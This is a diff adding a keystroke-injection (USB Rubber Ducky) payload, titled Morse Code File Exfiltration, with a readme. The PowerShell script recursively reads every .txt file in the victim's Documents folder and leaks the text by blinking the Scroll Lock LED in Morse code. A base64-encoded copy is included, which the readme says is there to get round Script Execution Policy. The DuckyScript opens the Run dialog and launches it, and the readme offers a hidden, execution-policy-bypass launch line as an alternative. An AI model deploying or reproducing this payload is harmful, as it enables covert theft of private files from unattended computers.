New Payload - Morse Code

payloads/library/exfiltration/Win_PoSH_MorseCode/MorseCodeFileExfiltration.ps1

@@ -0,0 +1,32 @@
+$o = New-Object -com wscript.shell;
+$h = @{ "1"="39999"; "2"="33999"; "3"="33399"; "4"="33339"; "5"="33333"; "6"="93333"; "7"="99333"; "8"="99933"; "9"="99993"; "0"="99999"; "A"="39"; "B"="9333"; "C"="9393"; "D"="933"; "E"="3"; "F"="3393"; "G"="993"; "H"="3333"; "I"="33"; "J"="3999"; "K"="939"; "L"="3933"; "M"="99"; "N"="93"; "O"="999"; "P"="3993"; "Q"="9939"; "R"="393"; "S"="333"; "T"="9"; "U"="339"; "V"="3339"; "W"="399"; "X"="9339"; "Y"="9399"; "Z"="9933" };
+$l = '{SCROLLLOCK}';
+function flashy($t){    
+    $o.SendKeys($l);
+    sleep -m ([int]$t);
+    $o.SendKeys($l);	
+	#[console]::beep(600,([int]$t));
+    sleep -m 300;
+}
+gci ([Environment]::GetFolderPath('MyDocuments')) -file -r *.txt | % { gc($_.FullName).ToUpper()} | % {$_[0..($_.length)]} | % {
+    $v = $h[[string]$_];
+    if ($v)
+    {
+        $v| % {$_[0..($_.length)]} | % {
+            flashy((([int]([string]$_))*100));
+        }
+    }
+    elseif ((!$v) -and !(([int]$_) -eq 32))
+    {
+        flashy(2700);
+        $v = ([string]([int]$_));
+        $v| % {$_[0..($_.length)]} | % {
+            $h[[string]$_] | % {$_[0..($_.length)]} | % {
+                flashy((([int]([string]$_))*100));
+            }
+        }
+    }else{ 
+        sleep -m 1200;
+    }
+    sleep -m 600;
+ }

payloads/library/exfiltration/Win_PoSH_MorseCode/b.txt

@@ -0,0 +1 @@
+JABvACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAGMAbwBtACAAdwBzAGMAcgBpAHAAdAAuAHMAaABlAGwAbAA7ACAAJABoACAAPQAgAEAAewAgACIAMQAiAD0AIgAzADkAOQA5ADkAIgA7ACAAIgAyACIAPQAiADMAMwA5ADkAOQAiADsAIAAiADMAIgA9ACIAMwAzADMAOQA5ACIAOwAgACIANAAiAD0AIgAzADMAMwAzADkAIgA7ACAAIgA1ACIAPQAiADMAMwAzADMAMwAiADsAIAAiADYAIgA9ACIAOQAzADMAMwAzACIAOwAgACIANwAiAD0AIgA5ADkAMwAzADMAIgA7ACAAIgA4ACIAPQAiADkAOQA5ADMAMwAiADsAIAAiADkAIgA9ACIAOQA5ADkAOQAzACIAOwAgACIAMAAiAD0AIgA5ADkAOQA5ADkAIgA7ACAAIgBBACIAPQAiADMAOQAiADsAIAAiAEIAIgA9ACIAOQAzADMAMwAiADsAIAAiAEMAIgA9ACIAOQAzADkAMwAiADsAIAAiAEQAIgA9ACIAOQAzADMAIgA7ACAAIgBFACIAPQAiADMAIgA7ACAAIgBGACIAPQAiADMAMwA5ADMAIgA7ACAAIgBHACIAPQAiADkAOQAzACIAOwAgACIASAAiAD0AIgAzADMAMwAzACIAOwAgACIASQAiAD0AIgAzADMAIgA7ACAAIgBKACIAPQAiADMAOQA5ADkAIgA7ACAAIgBLACIAPQAiADkAMwA5ACIAOwAgACIATAAiAD0AIgAzADkAMwAzACIAOwAgACIATQAiAD0AIgA5ADkAIgA7ACAAIgBOACIAPQAiADkAMwAiADsAIAAiAE8AIgA9ACIAOQA5ADkAIgA7ACAAIgBQACIAPQAiADMAOQA5ADMAIgA7ACAAIgBRACIAPQAiADkAOQAzADkAIgA7ACAAIgBSACIAPQAiADMAOQAzACIAOwAgACIAUwAiAD0AIgAzADMAMwAiADsAIAAiAFQAIgA9ACIAOQAiADsAIAAiAFUAIgA9ACIAMwAzADkAIgA7ACAAIgBWACIAPQAiADMAMwAzADkAIgA7ACAAIgBXACIAPQAiADMAOQA5ACIAOwAgACIAWAAiAD0AIgA5ADMAMwA5ACIAOwAgACIAWQAiAD0AIgA5ADMAOQA5ACIAOwAgACIAWgAiAD0AIgA5ADkAMwAzACIAIAB9ADsAIAAkAGwAIAA9ACAAJwB7AFMAQwBSAE8ATABMAEwATwBDAEsAfQAnADsAIABmAHUAbgBjAHQAaQBvAG4AIABmAGwAYQBzAGgAeQAoACQAdAApAHsAIAAgACAAIAAgACAAIAAgACAAJABvAC4AUwBlAG4AZABLAGUAeQBzACgAJABsACkAOwAgACAAIAAgACAAcwBsAGUAZQBwACAALQBtACAAKABbAGkAbgB0AF0AJAB0ACkAOwAgACAAIAAgACAAJABvAC4AUwBlAG4AZABLAGUAeQBzACgAJABsACkAOwAgACAAIAAgACAAcwBsAGUAZQBwACAALQBtACAAMwAwADAAOwAgAH0AIABnAGMAaQAgACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoARwBlAHQARgBvAGwAZABlAHIAUABhAHQAaAAoACcATQB5AEQAbwBjAHUAbQBlAG4AdABzACcAKQApACAALQBmAGkAbABlACAALQByACAAKgAuAHQAeAB0ACAAfAAgACUAIAB7ACAAZwBjACgAJABfAC4ARgB1AGwAbABOAGEAbQBlACkALgBUAG8AVQBwAHAAZQByACgAKQB9ACAAfAAgACUAIAB7ACQAXwBbADAALgAuACgAJABfAC4AbABlAG4AZwB0AGgAKQBdAH0AIAB8ACAAJQAgAHsAIAAgACAAIAAgACQAdgAgAD0AIAAkAGgAWwBbAHMAdAByAGkAbgBnAF0AJABfAF0AOwAgACAAIAAgACAAaQBmACAAKAAkAHYAKQAgACAAIAAgACAAewAgACAAIAAgACAAIAAgACAAIAAkAHYAfAAgACUAIAB7ACQAXwBbADAALgAuACgAJABfAC4AbABlAG4AZwB0AGgAKQBdAH0AIAB8ACAAJQAgAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABmAGwAYQBzAGgAeQAoACgAKABbAGkAbgB0AF0AKABbAHMAdAByAGkAbgBnAF0AJABfACkAKQAqADEAMAAwACkAKQA7ACAAIAAgACAAIAAgACAAIAAgAH0AIAAgACAAIAAgAH0AIAAgACAAIAAgAGUAbABzAGUAaQBmACAAKAAoACEAJAB2ACkAIAAtAGEAbgBkACAAIQAoACgAWwBpAG4AdABdACQAXwApACAALQBlAHEAIAAzADIAKQApACAAIAAgACAAIAB7ACAAIAAgACAAIAAgACAAIAAgAGYAbABhAHMAaAB5ACgAMgA3ADAAMAApADsAIAAgACAAIAAgACAAIAAgACAAJAB2ACAAPQAgACgAWwBzAHQAcgBpAG4AZwBdACgAWwBpAG4AdABdACQAXwApACkAOwAgACAAIAAgACAAIAAgACAAIAAkAHYAfAAgACUAIAB7ACQAXwBbADAALgAuACgAJABfAC4AbABlAG4AZwB0AGgAKQBdAH0AIAB8ACAAJQAgAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGgAWwBbAHMAdAByAGkAbgBnAF0AJABfAF0AIAB8ACAAJQAgAHsAJABfAFsAMAAuAC4AKAAkAF8ALgBsAGUAbgBnAHQAaAApAF0AfQAgAHwAIAAlACAAewAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAZgBsAGEAcwBoAHkAKAAoACgAWwBpAG4AdABdACgAWwBzAHQAcgBpAG4AZwBdACQAXwApACkAKgAxADAAMAApACkAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0AIAAgACAAIAAgACAAIAAgACAAfQAgACAAIAAgACAAfQBlAGwAcwBlAHsAIAAgACAAIAAgACAAIAAgACAAIABzAGwAZQBlAHAAIAAtAG0AIAAxADIAMAAwADsAIAAgACAAIAAgAH0AIAAgACAAIAAgAHMAbABlAGUAcAAgAC0AbQAgADYAMAAwADsAIAAgAH0A

payloads/library/exfiltration/Win_PoSH_MorseCode/payload.txt

@@ -0,0 +1,60 @@
+REM Title:        Morse Code File Exfiltration
+REM Description:  Reads all txt files in myDocs and Flashes the Scrolllock on and off to represent morse code  
+REM Author:       Cribbit
+REM Version:      1.2
+REM Category:     Exfiltration
+REM Target:       Windows (Powershell 5.1+)
+REM Attackmodes:  HID & STORAGE
+REM Note:        For characters outside the Morse code 0..9 A..Z it now flash one long pulse then the chars ordinal value i.e. (@ = 64 = -.... ....-)	
+ATTACKMODE HID STORAGE
+
+EXTENSION PASSIVE_WINDOWS_DETECT
+    REM VERSION 1.0
+
+    REM Windows fully passive OS Detection and passive Detect Ready
+    REM Includes its own passive detect ready. Does not require
+    REM additional extensions
+
+    REM USAGE:
+    REM Extension runs inline (here)
+    REM Place at beginning of payload (besides ATTACKMODE) to act as dynamic
+    REM boot delay
+    REM $_OS will be set to WINDOWS or NOT_WINDOWS
+
+    REM CONFIGURATION:
+    DEFINE MAX_WAIT 150
+    DEFINE CHECK_INTERVAL 20
+    DEFINE WINDOWS_HOST_REQUEST_COUNT 2
+    DEFINE NOT_WINDOWS 7
+
+    VAR $MAX_TRIES = MAX_WAIT
+    WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
+        DELAY CHECK_INTERVAL
+        $MAX_TRIES = ($MAX_TRIES - 1)
+    END_WHILE
+    IF ($_HOST_CONFIGURATION_REQUEST_COUNT > WINDOWS_HOST_REQUEST_COUNT) THEN
+        $_OS = WINDOWS
+    ELSE
+        $_OS = NOT_WINDOWS
+    END_IF
+
+    REM EXAMPLE USAGE AFTER EXTENSION
+    REM IF ($_OS == WINDOWS) THEN
+    REM     STRING HELLO WINDOWS!
+    REM ELSE
+    REM     STRING HELLO WORLD!
+    REM END_IF
+END_EXTENSION
+
+
+IF ($_OS == WINDOWS)
+    LED_GREEN
+    REM Give explorer time to show 
+    DELAY 2000
+    GUI r
+    DELAY 200
+    STRINGLN powershell .(powershell.exe -encodedCommand (gc((gwmi win32_volume -f 'label=''DUCKY''').Name+'\b.txt')))
+ELSE
+    LED_RED
+END_IF
+

payloads/library/exfiltration/Win_PoSH_MorseCode/readme.md

@@ -0,0 +1,26 @@
+# :flashlight: Morse Code File Exfiltration
+* Author: Cribbit 
+* Version: 1.2
+* Target: Windows (Powershell 5.1+)
+* Category: Exfiltration
+* Attackmode: HID & Storage
+
+## :book: Description
+Reads all txt files in "my documents" and flashes the scroll lock on and off to represent Morse code of the English alphanumeric characters (0..9 A..Z)
+For characters outside the Morse code 0..9 A..Z it now flash one long pulse then the chars ordinal value i.e. (@ = 64 = -.... ....-)
+
+## :musical_note: Note
+This is not a very useful payload with limitation of morse code but I thought it was fun to create.
+
+The payload uses a base64 encode version of the payload (b.txt) to get round the Script Execution Policy. There is a non-base64 version in the file (MorseCodeFileExfiltration.ps1) so you can see what it is doing. 
+
+Please check the encoded payload before execution, to make sure it has not been replaced with something more malicious. 
+
+If you do not want to use the base64 version you could change the payload to:
+`RUN WIN "powerShell -Noni -NoP -W h -EP Bypass .((gwmi win32_volume -f 'label=''DUCKY''').Name+'payloads\\$SWITCH_POSITION\MorseCodeFileExfiltration.ps1')"`
+
+
+## :page_facing_up: Change Log
+| Version | Changes                       |
+| ------- | ------------------------------|
+| 1.2     | Ported from BashBunny Repo    |